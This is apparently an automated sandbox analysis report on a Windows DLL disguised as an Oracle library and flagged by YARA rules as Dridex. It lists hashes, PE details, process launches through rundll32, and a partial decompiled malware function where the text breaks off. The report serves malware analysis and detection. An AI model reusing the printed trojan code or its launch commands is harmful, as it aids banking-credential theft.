Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6097.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4698
Entropy (8bit):	4.490534423613956
Encrypted:	false
SSDEEP:	48:cvIwSD8zsRJgtWI9RtWSC8B+8fm8M4JCdsD6hF5+q8/QYB754SrSSd:uITfjqcSNRJlqVU5DWSd
MD5:	671F09B31CC9A830D437045318954C3A
SHA1:	268D9552435BD588930BAA6FE561B848A93039A7
SHA-256:	E1CCEF37FF3FFDA37AE3F4434CEEFC4A4B7DAC35C8243AF7A015A6FDECC65B2E
SHA-512:	3DB8207532713FB5BC8326BAA9024E6004F5564F2BC31B73AC5D1ED148267FA8BA9520E0FD791EEAD8A6BE89B240E389347598D44AE98315C397EBA4138034F3
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309770" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.219198579898536
Encrypted:	false
SSDEEP:	12288:wnlDQ2UkoV/2qweb5Qnxbrmkk7I9ln/2VugiFlEkamEf2/6zfmBTS0:wlDQ2UkoV/nwebSaYlqu
MD5:	1FDF042991087FEB000304EDE09873FD
SHA1:	86F4A5960772839EB54FACAF2EB0AEE18D2E0C47
SHA-256:	F12745B570720D489952167E0305BE1D9285D956AC9B570F8BF294FA0ABB4EA9
SHA-512:	8E4AA41021B04E494C19EA13CC5D3DCBA5E89F0B104E16D0664DC99E2D6A77CD461D01E6E0B8EBA9A010BD8CB2B3F80A698F15840223D31DA90801744EBAB422
Malicious:	false
Reputation:	low
Preview:	regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..1N.................................................................................................................................................................................................................................................................................................................................................5.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.5233007303433506
Encrypted:	false
SSDEEP:	384:RsA5NnIrnc8WTVgG1K0XQmnQIRNovOgl8:a2xAc80VgGU0X7nQIIvP
MD5:	D13F80EEE1683F406026292ED83DF361
SHA1:	809EFC26106DAF98C9B149AF9A1BB7EE8BA14BF3
SHA-256:	6C6F3169DB17CA0E2B55FFD7ABEBAB7EF1807181C916243FFD86AA9426E067B7
SHA-512:	9F35A8207DB3AD34A5ED40F7E6428859DEFB42C83A6824EB1381228C3DEC33502A091FE9E203D4562FFE7C07D967811DB4A814B2E995F421A69427FD9CABCDA4
Malicious:	false
Reputation:	low
Preview:	regfU...U...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..1N.................................................................................................................................................................................................................................................................................................................................................5.HvLE.N......U............w..{..qx@?..Q`_.................`... ..hbin................p.\..,..........nk,.z3BN.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .z3BN........ ........................... .......Z.......................Root........lf......Root....nk .z3BN.....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.322432304733337
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll
File size:	544768
MD5:	d633b0989e97dc05b09b6233fb53cf37
SHA1:	6e5a7f0493fea40bd213209ad06f4dd9069969ed
SHA256:	03ba158e40b1f9c80c0430cd9a06f00bcbddd3826a5965fccb4ac5b242b91a2c
SHA512:	28a594e2f150c7f9a970f068072fe92bcc4c08dc28893023675fec9ea60926c36c044f8200ff6b5759c6173a2ab3771fa18545c3fa8b9c5328ff54e615eb705c
SSDEEP:	6144:0k+RYf/Mv1UvT4vjYf/Glpov3KvfMvLo+jwHk3UryzU3+R7ff4evm35IQku4+pMs:0kt2UAogoOwhx7nA4+pMTg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004db0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C2E245 [Wed Dec 22 08:31:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e980d287af7ef0ccd616c6efb9daaae8

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F13889AB931h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000090h
mov eax, dword ptr [ebp+08h]
mov byte ptr [esp+00000083h], 00000064h
mov dword ptr [esp+70h], 02263442h
mov dword ptr [esp+44h], eax
call 00007F13889AF4BAh
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
movzx edi, word ptr [esp+0000008Ah]
mov bx, di
mov dword ptr [esp+40h], eax
mov eax, edi
xor eax, 0000E2E7h
mov word ptr [esp+3Eh], ax
mov al, byte ptr [esp+77h]
mov byte ptr [esp+3Dh], al
mov eax, dword ptr [esp+00000084h]
mov dword ptr [esp+38h], esi
mov si, word ptr [esp+3Eh]
mov word ptr [eax+eax+00000000h], si

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7c029	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c08c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x6b2e	0x7000	False	0.391671316964	data	4.4813428029	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7424e	0x75000	False	0.316216362847	data	7.44062865664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x6190	0x5000	False	0.24609375	data	5.03782298504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x2f0	0x1000	False	0.09033203125	data	0.789164600932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x1138	0x2000	False	0.2421875	data	4.12390144992	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x84060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
ADVAPI32.dll	RegCloseKey, QueryServiceStatusEx, AccessCheck
WS2_32.dll	WSACleanup
USER32.dll	GetWindowTextA
KERNEL32.dll	CloseHandle, GetModuleHandleW, GetFileSize, OutputDebugStringA, IsDebuggerPresent, GetModuleFileNameW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6168 Parent PID: 5288

General

Start time:	20:19:35
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll"
Imagebase:	0xad0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1228 Parent PID: 6168

General

Start time:	20:19:35
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4232 Parent PID: 1228

General

Start time:	20:19:35
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.23460.dll",#1
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000000.351015506.000000006F501000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.395029698.000000006F501000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000000.352673706.000000006F501000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4696 Parent PID: 4232

General

Start time:	20:19:39
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 684
Imagebase:	0x3c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6168 Parent PID: 5288 loaddll32.exeCOMMON

Executed Functions

Function 6F510730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6F510730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6f51d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6F51361C(0x30);
					 *0x6f51d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6F513698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6F51306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6f51d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6F510FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6f51d1f8 + 0xb)) = _t162;
					_t363 = E6F51306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6f51d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6F510730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6f51bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6F50F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6F50F828(_t429 + 0x24, E6F50F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6F50F4BC(_t429 + 0x24, E6F50F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6F515580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6F50F654(_t429 + 0x20);
							E6F5155B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6F515864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6F50DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6F5155B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6F515864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6F50DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6F5155B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6F515864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6F50DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6F50CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6F515558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6F50CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6F515558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6F50CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6F515558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6F50CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6F515558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6F50CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6F515558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6F50CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6F515558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6f51d1f8 + 0x24)) = _t189;
							_t190 = E6F511030(0xffffffffffffffff);
							_t320 =  *0x6f51d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6f51d1f8 + 0x2c)) = E6F5110A4(0x6f51d1f8, 0xffffffffffffffff);
								L78:
								if(E6F51306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6f51d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6F51306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6f51d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6F5135F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6F51306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6F5135F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6F50F584(_t429 + 0x18c, _t206);
								_t411 = E6F51306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6F50F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6F50F4BC(_t429 + 0x18c, 0);
								_t213 = E6F50F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6F5135F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6F50F4BC(_t429 + 0x18c, 0);
								E6F50DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6F51306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6F50DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6F51306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6F50E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6F514FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6F50E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6F50DFA4(_t429 + 0x1b8);
								E6F50DFA4(_t429 + 0x1b0);
								E6F50F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6F50BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6f51d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6F50BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6F5135F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6F51306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6F5135F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
